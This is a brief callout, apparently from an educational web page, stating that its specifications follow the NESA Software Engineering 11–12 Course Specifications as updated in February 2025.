📘

Syllabus Alignment

These specifications are based on the NESA Software Engineering 11–12 Course Specifications (updated Feb 2025).